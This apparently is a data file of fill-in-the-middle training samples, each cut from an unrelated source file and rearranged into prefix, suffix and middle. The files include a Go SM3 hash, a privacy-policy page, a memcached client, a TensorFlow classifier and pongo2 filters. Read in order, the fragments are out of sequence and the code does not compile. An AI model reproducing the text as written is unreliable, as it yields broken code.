func (sm3 *SM3) p0(x uint32) uint32 { return x ^ sm3.leftRotate(x, 9) ^ sm3.leftRotate(x, 17) }
func (sm3 *SM3) p1(x uint32) uint32 { return x ^ sm3.leftRotate(x, 15) ^ sm3.leftRotate(x, 23) }
func (sm3 *SM3) leftRotate(x uint32, i uint32) uint32 { return (x<<(i%32) | x>>(32-i%32)) }
func (sm3 *SM3) pad() []byte {
msg := sm3.unhandleMsg
msg = append(msg, 0x80)
blockSize := 64
for len(msg)%blockSize != 56 {
msg = append(msg, 0x00)
}
msg = append(msg, uint8(sm3.length>>56&0xff))
msg = append(msg, uint8(sm3.length>>48&0xff))
msg = append(msg, uint8(sm3.length>>40&0xff))
msg = append(msg, uint8(sm3.length>>32&0xff))
msg = append(msg, uint8(sm3.length>>24&0xff))
msg = append(msg, uint8(sm3.length>>16&0xff))
msg = append(msg, uint8(sm3.length>>8&0xff))
msg = append(msg, uint8(sm3.length>>0&0xff))
if len(msg)%64 != 0 |
return msg
}
func (sm3 *SM3) update(msg []byte, nblocks int) {
var w [68]uint32
var w1 [64]uint32
a, b, c, d, e, f, g, h := sm3.digest[0], sm3.digest[1], sm3.digest[2], sm3.digest[3], sm3.digest[4], sm3.digest[5], sm3.digest[6], sm3.digest[7]
for len(msg) >= 64 {
for i := 0; i < 16; i++ {
w[i] = binary.BigEndian.Uint32(msg[4*i : 4*(i+1)])
}
for i := 16; i < 68; i++ {
w[i] = sm3.p1(w[i-16]^w[i-9]^sm3.leftRotate(w[i-3], 15)) ^ sm3.leftRotate(w[i-13], 7) ^ w[i-6]
}
for i := 0; i < 64; i++ {
w1[i] = w[i] ^ w[i+4]
}
A, B, C, D, E, F, G, H := a, b, c, d, e, f, g, h
for i := 0; i < 16; i++ {
SS1 := sm3.leftRotate(sm3.leftRotate(A, 12)+E+sm3.leftRotate(0x79cc4519, uint32(i)), 7)
SS2 := SS1 ^ sm3.leftRotate(A, 12)
TT1 := sm3.ff0(A, B, C) + D + SS2 + w1[i]
TT2 := sm3.gg0(E, F, G) + H + SS1 + w[i]
D = C
C = sm3.leftRotate(B, 9)
B = A
A = TT1
H = G
G = sm3.leftRotate(F, 19)
F = E
E = sm3.p0(TT2)
}
for i := 16; i < 64; i++ {
SS1 := sm3.leftRotate(sm3.leftRotate(A, 12)+E+sm3.leftRotate(0x7a879d8a, uint32(i)), 7)
SS2 := SS1 ^ sm3.leftRotate(A, 12)
TT1 := sm3.ff1(A, B, C) + D + SS2 + w1[i]
TT2 := sm3.gg1(E, F, G) + H + SS1 + w[i]
D = C
C = sm3.leftRotate(B, 9)
B = A
A = TT1
H = G
G = sm3.leftRotate(F, 19)
F = E
E = sm3.p0(TT2)
}
a ^= A
b ^= B
c ^= C
d ^= D
e ^= E
f ^= F
g ^= G
h ^= H
msg = msg[64:]
}
sm3.digest[0], sm3.digest[1], sm3.digest[2], sm3.digest[3], sm3.digest[4], sm3.digest[5], sm3.digest[6], sm3.digest[7] = a, b, c, d, e, f, g, h
}
func New() hash.Hash {
var sm3 SM3
sm3.Reset()
return &sm3
}
func (sm3 *SM3) BlockSize() int { return 64 }
func (sm3 *SM3) Size() int { return 32 }
func (sm3 *SM3) Reset() {
// Reset digest
sm3.digest[0] = 0x7380166f
sm3.digest[1] = 0x4914b2b9
sm3.digest[2] = 0x172442d7
sm3.digest[3] = 0xda8a0600
sm3.digest[4] = 0xa96f30bc
sm3.digest[5] = 0x163138aa
sm3.digest[6] = 0xe38dee4d
sm3.digest[7] = 0xb0fb0e4e
sm3.length = 0
sm3.unhandleMsg = []byte{}
}
func (sm3 *SM3) Write(p []byte) (int, error) {
toWrite := len(p)
sm3.length += uint64(len(p) * 8)
msg := append(sm3.unhandleMsg, p...)
nblocks := len(msg) / sm3.BlockSize()
sm3.update(msg, nblocks)
sm3.unhandleMsg = msg[nblocks*sm3.BlockSize():]
return toWrite, nil
}
func (sm3 *SM3) Sum(in []byte) []byte {
sm3.Write(in)
msg := sm3.pad()
sm3.update(msg, len(msg)/sm3.BlockSize())
needed := sm3.Size()
if cap(in)-len(in) < needed {
newIn := make([]byte, len(in), len(in)+needed)
copy(newIn, in)
in = newIn
}
out := in[len(in) : len(in)+needed]
for i := 0; i < 8; i++ {
binary.BigEndian.PutUint32(out[i*4:], sm3.digest[i])
}
return out
}
func Sm3Sum(data []byte) []byte {
var sm3 SM3
sm3.Reset()
sm3.Write(data)
return sm3.Sum(nil)
}
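// Illustrative usage sketch (not part of the original file): computing an SM3 digest both
// through the streaming hash.Hash interface and with the one-shot Sm3Sum helper above.
// Note that this implementation's Sum also writes its argument into the hash before padding.
func exampleSM3Usage() ([]byte, []byte) {
	h := New()
	h.Write([]byte("abc"))           // incremental writes; partial blocks are buffered
	streamed := h.Sum(nil)           // 32-byte digest of "abc"
	oneShot := Sm3Sum([]byte("abc")) // convenience wrapper producing the same digest in one call
	return streamed, oneShot
}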
| {
panic("------SM3 Pad: error msgLen =")
} |
PrivacyPolicy.tsx | import * as React from 'react'
export const CurrentPrivacyPolicyVersion: PrivacyPolicyVersion = {
versionId: "0.3",
versionDate: new Date(2021, 5, 14, 0, 0, 0, 0)
}
export class PrivacyPolicyVersion {
versionId: string = "0.3";
versionDate: Date = new Date(2021, 5, 14, 0, 0, 0, 0);
}
// Note: this policy was generated by https://www.privacypolicygenerator.info/download.php?lang=en&token=IAx2sl4Q8Mslvuhn4tk2KRTSLHKa8LdG#
export const PrivacyPolicy: React.FC = () => {
return (
<div>
<h1>Privacy Policy for TrashMob</h1>
<p>At TrashMob, accessible from www.trashmob.eco, one of our main priorities is the privacy of our visitors. This Privacy Policy document contains types of information that is collected and recorded by TrashMob and how we use it.</p>
<p>If you have additional questions or require more information about our Privacy Policy, do not hesitate to contact us.</p>
            <p>This Privacy Policy applies only to our online activities and is valid for visitors to our website with regard to the information that they share and/or collect in TrashMob. This policy is not applicable to any information collected offline or via channels other than this website. Our Privacy Policy was created with the help of the <a href="https://www.privacypolicygenerator.org/">Free Privacy Policy Generator</a>.</p>
<h2>Consent</h2>
<p>By using our website, you hereby consent to our Privacy Policy and agree to its terms.</p>
<h2>Information we collect</h2>
<p>The personal information that you are asked to provide, and the reasons why you are asked to provide it, will be made clear to you at the point we ask you to provide your personal information.</p>
<p>If you contact us directly, we may receive additional information about you such as your name, email address, phone number, the contents of the message and/or attachments you may send us, and any other information you may choose to provide.</p>
<p>When you register for an Account, we may ask for your contact information, including items such as name, company name, address, email address, and telephone number.</p>
<h2>How we use your information</h2>
<p>We use the information we collect in various ways, including to:</p>
<ul>
<li>Provide, operate, and maintain our website</li>
<li>Improve, personalize, and expand our website</li>
<li>Understand and analyze how you use our website</li>
<li>Develop new products, services, features, and functionality</li>
<li>Communicate with you, either directly or through one of our partners, including for customer service, to provide you with updates and other information relating to the website, and for marketing and promotional purposes</li>
<li>Send you emails</li>
<li>Find and prevent fraud</li>
</ul>
<h2>Log Files</h2>
            <p>TrashMob follows a standard procedure of using log files. These files log visitors when they visit websites. All hosting companies do this as a part of hosting services' analytics. The information collected by log files includes internet protocol (IP) addresses, browser type, Internet Service Provider (ISP), date and time stamp, referring/exit pages, and possibly the number of clicks. These are not linked to any information that is personally identifiable. The purpose of the information is for analyzing trends, administering the site, tracking users' movement on the website, and gathering demographic information.</p>
<h2>Advertising Partners Privacy Policies</h2>
<p>You may consult this list to find the Privacy Policy for each of the advertising partners of TrashMob.</p>
            <p>Third-party ad servers or ad networks use technologies like cookies, JavaScript, or Web Beacons that are used in their respective advertisements and links that appear on TrashMob, which are sent directly to users' browsers. They automatically receive your IP address when this occurs. These technologies are used to measure the effectiveness of their advertising campaigns and/or to personalize the advertising content that you see on websites that you visit.</p>
<p>Note that TrashMob has no access to or control over these cookies that are used by third-party advertisers.</p>
<h2>Third Party Privacy Policies</h2>
<p>TrashMob's Privacy Policy does not apply to other advertisers or websites. Thus, we are advising you to consult the respective Privacy Policies of these third-party ad servers for more detailed information. It may include their practices and instructions about how to opt-out of certain options. </p>
<p>You can choose to disable cookies through your individual browser options. To know more detailed information about cookie management with specific web browsers, it can be found at the browsers' respective websites.</p>
<h2>CCPA Privacy Rights (Do Not Sell My Personal Information)</h2>
<p>Under the CCPA, among other rights, California consumers have the right to:</p>
<p>Request that a business that collects a consumer's personal data disclose the categories and specific pieces of personal data that a business has collected about consumers.</p>
<p>Request that a business delete any personal data about the consumer that a business has collected.</p>
<p>Request that a business that sells a consumer's personal data, not sell the consumer's personal data.</p>
<p>If you make a request, we have one month to respond to you. If you would like to exercise any of these rights, please contact us.</p>
| <p>The right to access – You have the right to request copies of your personal data. We may charge you a small fee for this service.</p>
<p>The right to rectification – You have the right to request that we correct any information you believe is inaccurate. You also have the right to request that we complete the information you believe is incomplete.</p>
<p>The right to erasure – You have the right to request that we erase your personal data, under certain conditions.</p>
<p>The right to restrict processing – You have the right to request that we restrict the processing of your personal data, under certain conditions.</p>
<p>The right to object to processing – You have the right to object to our processing of your personal data, under certain conditions.</p>
<p>The right to data portability – You have the right to request that we transfer the data that we have collected to another organization, or directly to you, under certain conditions.</p>
<p>If you make a request, we have one month to respond to you. If you would like to exercise any of these rights, please contact us.</p>
<h2>Children's Information</h2>
            <p>Another part of our priority is adding protection for children while using the internet. We encourage parents and guardians to observe, participate in, and/or monitor and guide their children's online activity.</p>
            <p>TrashMob does not knowingly collect any Personally Identifiable Information from children under the age of 13. If you think that your child provided this kind of information on our website, we strongly encourage you to contact us immediately and we will do our best to promptly remove such information from our records.</p>
</div>);
} | <h2>GDPR Data Protection Rights</h2>
<p>We would like to make sure you are fully aware of all of your data protection rights. Every user is entitled to the following:</p> |
client.go | package memcached
import (
"context"
"fmt"
"log"
"strings"
"sync"
"time"
"github.com/pkg/errors"
"github.com/serialx/hashring"
)
const connRequestQueueSize = 1000000
const (
defaultPort = 11211
defaultConnectTimeout = 1 * time.Second
defaultPollTimeout = 1 * time.Second
defaultTryReconnectPeriod = 60 * time.Second
defaultKeepAlivePeriod = 60 * time.Second
defaultMaxErrorCount = 100
)
// Client is the client of go-memcached.
type Client struct {
servers Servers
hashRing *hashring.HashRing
prefix string
connectTimeout time.Duration
pollTimeout time.Duration
tryReconnectPeriod time.Duration
keepAlivePeriod time.Duration
failover bool
maxOpen int // maximum amount of connection num. maxOpen <= 0 means unlimited.
maxLifetime time.Duration // maximum amount of time a connection may be reused
mu sync.RWMutex
cps map[string]*connectionPool
maxErrorCount int64
logf func(format string, params ...interface{})
}
// Servers is a slice of Server.
type Servers []Server
func (ss *Servers) getNodeNames() []string {
nodes := make([]string, len(*ss))
for i, s := range *ss {
nodes[i] = s.getNodeName()
}
return nodes
}
// Server is the server's info of memcached.
type Server struct {
Host string
Port int
Alias string
}
func (s *Server) getAddr() string {
port := s.Port
if port == 0 {
port = defaultPort
}
return fmt.Sprintf("%s:%d", s.Host, port)
}
func (s *Server) getNodeName() string {
if s.Alias == "" {
return s.getAddr()
}
return s.Alias
}
// New creates a new Client.
func | (servers Servers, prefix string) (cl *Client) {
cl = new(Client)
cl.servers = servers
cl.hashRing = hashring.New(cl.servers.getNodeNames())
cl.prefix = prefix
cl.connectTimeout = defaultConnectTimeout
cl.pollTimeout = defaultPollTimeout
cl.tryReconnectPeriod = defaultTryReconnectPeriod
cl.keepAlivePeriod = defaultKeepAlivePeriod
cl.maxErrorCount = defaultMaxErrorCount
cl.logf = log.Printf
cl.cps = make(map[string]*connectionPool, len(servers))
for i := range servers {
cl.cps[servers[i].getNodeName()] = cl.openConnectionPool(&servers[i])
}
return
}
func (cl *Client) openConnectionPool(server *Server) *connectionPool {
cp := new(connectionPool)
cp.cl = cl
cp.Server = server
cp.openerCh = make(chan struct{}, connRequestQueueSize)
cp.connRequests = make(map[uint64]chan connRequest)
go cp.opener()
return cp
}
// SetConnMaxLifetime sets the maximum amount of time a connection may be reused.
//
// Expired connections may be closed lazily before reuse.
//
// If d <= 0, connections are reused forever.
func (cl *Client) SetConnMaxLifetime(d time.Duration) {
if d < 0 {
d = 0
}
cl.mu.Lock()
defer cl.mu.Unlock()
cl.maxLifetime = d
// wake cleaner up when lifetime is shortened.
for node := range cl.cps {
cp := cl.cps[node]
if d > 0 && d < cl.maxLifetime && cp.cleanerCh != nil {
select {
case cp.cleanerCh <- struct{}{}:
default:
}
}
cp.startCleanerLocked()
}
}
// SetConnectTimeout sets the timeout of connect to memcached server.
func (cl *Client) SetConnectTimeout(timeout time.Duration) {
cl.mu.Lock()
defer cl.mu.Unlock()
cl.connectTimeout = timeout
}
// SetPollTimeout sets the timeout of polling from memcached server.
func (cl *Client) SetPollTimeout(timeout time.Duration) {
cl.mu.Lock()
defer cl.mu.Unlock()
cl.pollTimeout = timeout
}
// SetTryReconnectPeriod sets the period between reconnect attempts.
func (cl *Client) SetTryReconnectPeriod(period time.Duration) {
cl.mu.Lock()
defer cl.mu.Unlock()
cl.tryReconnectPeriod = period
}
// SetMaxErrorCount sets the maximum error count at which the connection pool is closed.
func (cl *Client) SetMaxErrorCount(count int64) {
cl.mu.Lock()
defer cl.mu.Unlock()
cl.maxErrorCount = count
}
// SetKeepAlivePeriod sets the period of keep alive.
func (cl *Client) SetKeepAlivePeriod(period time.Duration) {
cl.mu.Lock()
defer cl.mu.Unlock()
cl.keepAlivePeriod = period
}
// SetConnMaxOpen sets the maximum amount of opening connections.
func (cl *Client) SetConnMaxOpen(maxOpen int) {
cl.mu.Lock()
defer cl.mu.Unlock()
cl.maxOpen = maxOpen
}
// SetFailover is used to specify whether to use the failover option.
func (cl *Client) SetFailover(failover bool) {
cl.mu.Lock()
defer cl.mu.Unlock()
cl.failover = failover
}
// SetLogger is used to set logger
func (cl *Client) SetLogger(logf func(format string, params ...interface{})) {
cl.mu.Lock()
defer cl.mu.Unlock()
cl.logf = logf
}
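// Illustrative sketch (not part of the original file): wiring a Client together with the
// setters documented above. The host, port, alias and key prefix values are placeholders.
func exampleClientSetup() *Client {
	cl := New(Servers{
		{Host: "127.0.0.1", Port: 11211, Alias: "cache1"},
	}, "myapp:")
	cl.SetConnMaxOpen(32)                        // cap concurrently open connections per pool
	cl.SetConnMaxLifetime(5 * time.Minute)       // recycle connections lazily after 5 minutes
	cl.SetConnectTimeout(500 * time.Millisecond) // fail fast on unreachable nodes
	cl.SetFailover(true)                         // enable the failover option described above
	return cl
}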
func (cl *Client) removePrefix(key string) string {
if len(cl.prefix) == 0 {
return key
}
if strings.HasPrefix(key, "?") {
return strings.Join([]string{"?", strings.Replace(key[1:], cl.prefix, "", 1)}, "")
}
return strings.Replace(key, cl.prefix, "", 1)
}
func (cl *Client) addPrefix(key string) string {
if len(cl.prefix) == 0 {
return key
}
if strings.HasPrefix(key, "?") {
return strings.Join([]string{"?", cl.prefix, key[1:]}, "")
}
return strings.Join([]string{cl.prefix, key}, "")
}
func (cl *Client) conn(keys ...string) (map[string]*conn, error) {
nodes := make([]string, 0, len(cl.cps))
if len(keys) == 0 {
for node := range cl.cps {
nodes = append(nodes, node)
}
m, err := cl._conn(context.Background(), nodes)
return m, errors.Wrap(err, "Failed _conn")
}
nodeMap := map[string]struct{}{}
for _, key := range keys {
if len(key) == 0 {
continue
}
rawkey := cl.addPrefix(key)
node, ok := cl.hashRing.GetNode(rawkey)
if !ok {
return map[string]*conn{}, errors.New("Failed GetNode")
}
nodeMap[node] = struct{}{}
}
for node := range nodeMap {
nodes = append(nodes, node)
}
m, err := cl._conn(context.Background(), nodes)
return m, errors.Wrap(err, "Failed _conn")
}
func (cl *Client) _conn(ctx context.Context, nodes []string) (map[string]*conn, error) {
var (
wg sync.WaitGroup
sm sync.Map
)
nl := len(nodes)
m := make(map[string]*conn, nl)
ec := make(chan error, nl)
for _, node := range nodes {
wg.Add(1)
go func(node string) {
defer wg.Done()
cp := cl.cps[node]
cp.mu.RLock()
closed := cp.closed
cp.mu.RUnlock()
if closed {
return
}
c, err := cp.conn(ctx)
if err != nil {
ec <- errors.Wrap(err, "Failed conn")
if cp.circuitBreaker(err) {
cl.removeNode(node)
cp.close()
go cl.tryReconnect()
}
}
sm.Store(node, c)
}(node)
}
wg.Wait()
close(ec)
for err := range ec {
if err != nil {
return m, err
}
}
sm.Range(func(key interface{}, value interface{}) bool {
k, ok := key.(string)
if !ok {
cl.logf("Unexpected key type: %T", key)
return false
}
c, ok := value.(*conn)
if !ok {
cl.logf("Unexpected value type: %T", value)
return false
}
m[k] = c
return true
})
return m, nil
}
func (cl *Client) putConn(m map[string]*conn, err error) {
for node, c := range m {
cp := cl.cps[node]
if err1 := cp.putConn(c, err); err1 != nil {
cl.logf("Failed putConn: %v", err)
}
}
}
func (cl *Client) addNode(node string) {
cl.mu.Lock()
defer cl.mu.Unlock()
cl.hashRing = cl.hashRing.AddNode(node)
}
func (cl *Client) removeNode(node string) {
cl.mu.Lock()
defer cl.mu.Unlock()
cl.hashRing = cl.hashRing.RemoveNode(node)
}
// Close closes all connectionPools and channels
func (cl *Client) Close() error {
cl.mu.Lock()
defer cl.mu.Unlock()
for node := range cl.cps {
if err := cl.cps[node].close(); err != nil {
cl.logf("Failed pool.close: %v", err)
}
}
return nil
}
func (cl *Client) tryReconnect() {
for {
time.Sleep(cl.tryReconnectPeriod)
closedPools := make(map[string]*connectionPool, len(cl.cps))
for node, cp := range cl.cps {
if cp.closed {
closedPools[node] = cp
}
}
if len(closedPools) == 0 {
return
}
var existsDeadConn bool
for node, cp := range closedPools {
if c, err := cp.newConn(); err == nil {
c.close()
cl.addNode(node)
cp.mu.Lock()
cp.closed = false
cp.openerCh = make(chan struct{}, connRequestQueueSize)
cp.mu.Unlock()
go cp.opener()
continue
}
existsDeadConn = true
}
if !existsDeadConn {
return
}
}
}
| New |
try_test.go | package analysis
import (
"testing"
"github.com/bradleyjkemp/cupaloy"
)
func TestCatchClause(t *testing.T) | {
data := []byte(`<?php
namespace App;
use Exception;
try {
} catch (\NotFoundException $ex) {
} catch (\HttpException | Exception $ex) {
} catch (\Throwable $ex) {
}`)
doc := NewDocument("test1", data)
doc.Load()
results := []*ClassAccess{}
tra := newTraverser()
tra.traverseDocument(doc, func(_ *traverser, symbol Symbol, _ []Symbol) {
if classAccess, ok := symbol.(*ClassAccess); ok {
results = append(results, classAccess)
}
})
cupaloy.SnapshotT(t, results)
} |
|
mcnn_model.py | import multiprocessing
import tensorflow as tf
from tensorflow.contrib import estimator
from tensorflow.contrib import lookup
from model import commons
|
def parse_csv_row(row):
columns = tf.decode_csv(row, record_defaults=commons.HEADER_DEFAULTS, field_delim='\t')
features = dict(zip(commons.HEADERS, columns))
target = features.pop(commons.LABEL_COL)
return features, tf.string_to_number(target, out_type=tf.int32)
def input_fn(file_name, batch_size=32, shuffle=False, repeat_count=1):
num_threads = multiprocessing.cpu_count()
data_set = tf.data.TextLineDataset(filenames=file_name).skip(1)
if shuffle:
data_set = data_set.shuffle(buffer_size=1000)
data_set = data_set.map(lambda row: parse_csv_row(row), num_parallel_calls=num_threads).batch(batch_size) \
.repeat(repeat_count).prefetch(1000)
iterator = data_set.make_one_shot_iterator()
features, target = iterator.get_next()
return features, target
def model_fn(features, labels, mode, params):
if mode == tf.estimator.ModeKeys.TRAIN:
tf.keras.backend.set_learning_phase(True)
else:
tf.keras.backend.set_learning_phase(False)
vocab_table = lookup.index_table_from_file(vocabulary_file='data/vocab.csv', num_oov_buckets=1, default_value=-1)
text = features[commons.FEATURE_COL]
words = tf.string_split(text)
dense_words = tf.sparse_tensor_to_dense(words, default_value=commons.PAD_WORD)
word_ids = vocab_table.lookup(dense_words)
padding = tf.constant([[0, 0], [0, commons.MAX_DOCUMENT_LENGTH]])
# Pad all the word_ids entries to the maximum document length
word_ids_padded = tf.pad(word_ids, padding)
word_id_vector = tf.slice(word_ids_padded, [0, 0], [-1, commons.MAX_DOCUMENT_LENGTH])
f1 = tf.keras.layers.Embedding(params.N_WORDS, 100, input_length=commons.MAX_DOCUMENT_LENGTH)(word_id_vector)
f2 = tf.keras.layers.Embedding(params.N_WORDS, 200, input_length=commons.MAX_DOCUMENT_LENGTH)(word_id_vector)
f3 = tf.keras.layers.Embedding(params.N_WORDS, 300, input_length=commons.MAX_DOCUMENT_LENGTH)(word_id_vector)
filter_sizes = [3, 5]
conv_pools = []
for text_embedding in [f1, f2, f3]:
for filter_size in filter_sizes:
l_zero = tf.keras.layers.ZeroPadding1D((filter_size - 1, filter_size - 1))(text_embedding)
l_conv = tf.keras.layers.Conv1D(filters=32, kernel_size=filter_size, padding='same', activation='tanh')(l_zero)
l_pool = tf.keras.layers.GlobalMaxPool1D()(l_conv)
conv_pools.append(l_pool)
merged = tf.keras.layers.Concatenate(axis=1)(conv_pools)
dense1 = tf.keras.layers.Dense(128, activation='relu', kernel_regularizer=tf.keras.regularizers.l2(0.01))(merged)
dense2 = tf.keras.layers.Dense(64, activation='relu', kernel_regularizer=tf.keras.regularizers.l2(0.01))(dense1)
logits = tf.keras.layers.Dense(1, activation=None)(dense2)
if labels is not None:
labels = tf.reshape(labels, [-1, 1])
optimizer = tf.train.AdamOptimizer()
def _train_op_fn(loss):
return optimizer.minimize(loss=loss, global_step=tf.train.get_global_step())
return head.create_estimator_spec(features=features, labels=labels, mode=mode, logits=logits,
train_op_fn=_train_op_fn)
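# Illustrative sketch (not part of the original file): wiring input_fn, model_fn and
# serving_fn into a TF 1.x Estimator. The file path, model_dir and N_WORDS value are
# placeholder assumptions.
def train_and_export_sketch(train_file='data/train.tsv', model_dir='model_dir', n_words=10000):
    params = tf.contrib.training.HParams(N_WORDS=n_words)
    classifier = tf.estimator.Estimator(model_fn=model_fn, model_dir=model_dir, params=params)
    classifier.train(input_fn=lambda: input_fn(train_file, batch_size=32, shuffle=True, repeat_count=5))
    classifier.export_savedmodel(model_dir, serving_fn)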
def serving_fn():
receiver_tensor = {
commons.FEATURE_COL: tf.placeholder(dtype=tf.string, shape=None)
}
features = {
key: tensor
for key, tensor in receiver_tensor.items()
}
return tf.estimator.export.ServingInputReceiver(features, receiver_tensor) | __author__ = 'KKishore'
head = estimator.binary_classification_head() |
Largest_Range.py | array_to_analyze = [11,7,3,4,2,5,1,0]
def largestRange(array_to_analyze):
# create a dictionary / hash table to keep track if we've seen the number already
|
# all good
print(largestRange(array_to_analyze)) | elements = {x:0 for x in array_to_analyze} # set them all to "0"
#how many places have we moved to the left and right
left = 0
right = 0
#for each number
for entry in array_to_analyze:
#if the number has not been seen yet
if elements[entry] == 0:
left_count = entry-1 # start moving to the left
right_count = entry +1 # and the right
# if this left exists
while left_count in elements:
elements[left_count] = 1 # add it to the dictionary
left_count = left_count-1 #keep moving left if the previous number existed in the array
left_count = left_count +1
# if this right exists
while right_count in elements:
elements[right_count] = 1 # add it to the dictionary
right_count = right_count+1 #keep moving right if the previous number existed in the array
right_count = right_count -1
            # the +1/-1 adjustments above step the counters back to the last number actually found,
            # since the loops overshoot by one before stopping
            # if this candidate range is at least as large as the best so far (or we are still at 0,0), record it
if (right-left) <= (right_count-left_count):
right = right_count
left = left_count
return[left, right] |
mirror.go | package mirror
import (
"log"
"github.com/petereps/gomirror/pkg/docker"
"bytes"
"fmt"
"io/ioutil"
"net/http"
"net/http/httputil"
"net/url"
"time"
"github.com/docker/docker/client" |
"github.com/sirupsen/logrus"
)
// Mirror proxies requests to an upstream server, and
// mirrors request to a mirror server
type Mirror struct {
*httputil.ReverseProxy
client *http.Client
cfg *Config
}
// New returns an initialized Mirror instance
func New(cfg *Config) (*Mirror, error) {
primaryServerURL, err := url.Parse(cfg.Primary.URL)
if err != nil {
return nil, err
}
proxy := httputil.NewSingleHostReverseProxy(primaryServerURL)
if cfg.Primary.DockerLookup.Enabled {
cli, err := client.NewEnvClient()
if err != nil {
log.Fatalf("could not get docker client: %+v", err)
}
dockerDNS := docker.NewDNSResolver(cli, cfg.Primary.DockerLookup.HostIdentifier)
proxy = dockerDNS.ReverseProxy(primaryServerURL)
}
return &Mirror{
proxy,
&http.Client{
Timeout: time.Minute * 1,
},
cfg,
}, nil
}
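// Illustrative sketch (not part of the original file): building a Mirror from an already
// populated *Config (its definition lives elsewhere in this package) and serving it.
// The listen address is a placeholder.
func exampleRunMirror(cfg *Config) error {
	m, err := New(cfg)
	if err != nil {
		return err
	}
	return m.Serve(":8080")
}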
func (m *Mirror) mirror(proxyReq *http.Request) {
entry := logrus.WithField("mirror_url", proxyReq.URL.String())
entry.Debugln("mirroring")
response, err := m.client.Do(proxyReq)
if err != nil {
entry.WithError(err).
Debugln("error in mirrored request")
return
}
body, err := ioutil.ReadAll(response.Body)
if err != nil {
entry.WithError(err).
Debugln("error reading mirrored request")
return
}
entry.WithField("response", string(body)).
Debugln("mirrored response")
}
func (m *Mirror) ServeHTTP(w http.ResponseWriter, r *http.Request) {
// add path and query string (doing this manually so things like localhost work to mirror)
path := r.URL.EscapedPath()
query := r.URL.RawQuery
proxyReqURL := m.cfg.Mirror.URL
	// strip a trailing slash so joining with the escaped path below does not produce "//"
	if proxyReqURL != "" && proxyReqURL[len(proxyReqURL)-1] == '/' {
		proxyReqURL = proxyReqURL[:len(proxyReqURL)-1]
	}
if query != "" {
query = "?" + query
}
proxyReqURL = fmt.Sprintf("%s%s%s", proxyReqURL, path, query)
logrus.WithField("mirror_url", proxyReqURL).Debugln()
proxyReq, proxyReqErr := http.NewRequest(
r.Method, proxyReqURL, nil,
)
if proxyReqErr != nil {
logrus.WithError(proxyReqErr).
Errorln("error creating mirroring request")
}
if m.cfg.Primary.DoMirrorBody {
// we need to buffer the body in order to send to both upstream
// requests
body, err := ioutil.ReadAll(r.Body)
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
r.Body = ioutil.NopCloser(bytes.NewReader(body))
proxyReq.Body = ioutil.NopCloser(bytes.NewReader(body))
}
if m.cfg.Primary.DoMirrorHeaders {
for key, value := range r.Header {
proxyReq.Header.Set(key, value[0])
}
}
for _, header := range m.cfg.Mirror.Headers {
proxyReq.Header.Set(header.Key, header.Value)
}
for _, header := range m.cfg.Primary.Headers {
r.Header.Set(header.Key, header.Value)
}
if proxyReqErr == nil {
go m.mirror(proxyReq)
}
m.ReverseProxy.ServeHTTP(w, r)
}
// Serve serves the mirror
func (m *Mirror) Serve(address string) error {
return http.ListenAndServe(address, m)
} | |
filters_builtin.go | package pongo2
/* Filters that are provided through github.com/flosch/pongo2-addons:
------------------------------------------------------------------
filesizeformat
slugify
timesince
timeuntil
Filters that won't be added:
----------------------------
get_static_prefix (reason: web-framework specific)
pprint (reason: python-specific)
static (reason: web-framework specific)
Reconsideration (not implemented yet):
--------------------------------------
force_escape (reason: not yet needed since this is the behaviour of pongo2's escape filter)
safeseq (reason: same reason as `force_escape`)
unordered_list (python-specific; not sure whether needed or not)
dictsort (python-specific; maybe one could add a filter to sort a list of structs by a specific field name)
dictsortreversed (see dictsort)
*/
import (
"bytes"
"fmt"
"math/rand"
"net/url"
"regexp"
"strconv"
"strings"
"time"
"unicode/utf8"
)
func init() {
rand.Seed(time.Now().Unix())
RegisterFilter("escape", filterEscape)
RegisterFilter("safe", filterSafe)
RegisterFilter("escapejs", filterEscapejs)
RegisterFilter("add", filterAdd)
RegisterFilter("addslashes", filterAddslashes)
RegisterFilter("capfirst", filterCapfirst)
RegisterFilter("center", filterCenter)
RegisterFilter("cut", filterCut)
RegisterFilter("date", filterDate)
RegisterFilter("default", filterDefault)
RegisterFilter("default_if_none", filterDefaultIfNone)
RegisterFilter("divisibleby", filterDivisibleby)
RegisterFilter("first", filterFirst)
RegisterFilter("floatformat", filterFloatformat)
RegisterFilter("get_digit", filterGetdigit)
RegisterFilter("iriencode", filterIriencode)
RegisterFilter("join", filterJoin)
RegisterFilter("last", filterLast)
RegisterFilter("length", filterLength)
RegisterFilter("length_is", filterLengthis)
RegisterFilter("linebreaks", filterLinebreaks)
RegisterFilter("linebreaksbr", filterLinebreaksbr)
RegisterFilter("linenumbers", filterLinenumbers)
RegisterFilter("ljust", filterLjust)
RegisterFilter("lower", filterLower)
RegisterFilter("make_list", filterMakelist)
RegisterFilter("phone2numeric", filterPhone2numeric)
RegisterFilter("pluralize", filterPluralize)
RegisterFilter("random", filterRandom)
RegisterFilter("removetags", filterRemovetags)
RegisterFilter("rjust", filterRjust)
RegisterFilter("slice", filterSlice)
RegisterFilter("split", filterSplit)
RegisterFilter("stringformat", filterStringformat)
RegisterFilter("striptags", filterStriptags)
RegisterFilter("time", filterDate) // time uses filterDate (same golang-format)
RegisterFilter("title", filterTitle)
RegisterFilter("truncatechars", filterTruncatechars)
RegisterFilter("truncatechars_html", filterTruncatecharsHTML)
RegisterFilter("truncatewords", filterTruncatewords)
RegisterFilter("truncatewords_html", filterTruncatewordsHTML)
RegisterFilter("upper", filterUpper)
RegisterFilter("urlencode", filterUrlencode)
RegisterFilter("urlize", filterUrlize)
RegisterFilter("urlizetrunc", filterUrlizetrunc)
RegisterFilter("wordcount", filterWordcount)
RegisterFilter("wordwrap", filterWordwrap)
RegisterFilter("yesno", filterYesno)
RegisterFilter("float", filterFloat) // pongo-specific
RegisterFilter("integer", filterInteger) // pongo-specific
}
func filterTruncatecharsHelper(s string, newLen int) string {
runes := []rune(s)
if newLen < len(runes) {
if newLen >= 3 {
return fmt.Sprintf("%s...", string(runes[:newLen-3]))
}
// Not enough space for the ellipsis
return string(runes[:newLen])
}
return string(runes)
}
func filterTruncateHTMLHelper(value string, newOutput *bytes.Buffer, cond func() bool, fn func(c rune, s int, idx int) int, finalize func()) {
vLen := len(value)
var tagStack []string
idx := 0
for idx < vLen && !cond() {
c, s := utf8.DecodeRuneInString(value[idx:])
if c == utf8.RuneError {
idx += s
continue
}
if c == '<' {
newOutput.WriteRune(c)
idx += s // consume "<"
if idx+1 < vLen {
if value[idx] == '/' {
// Close tag
newOutput.WriteString("/")
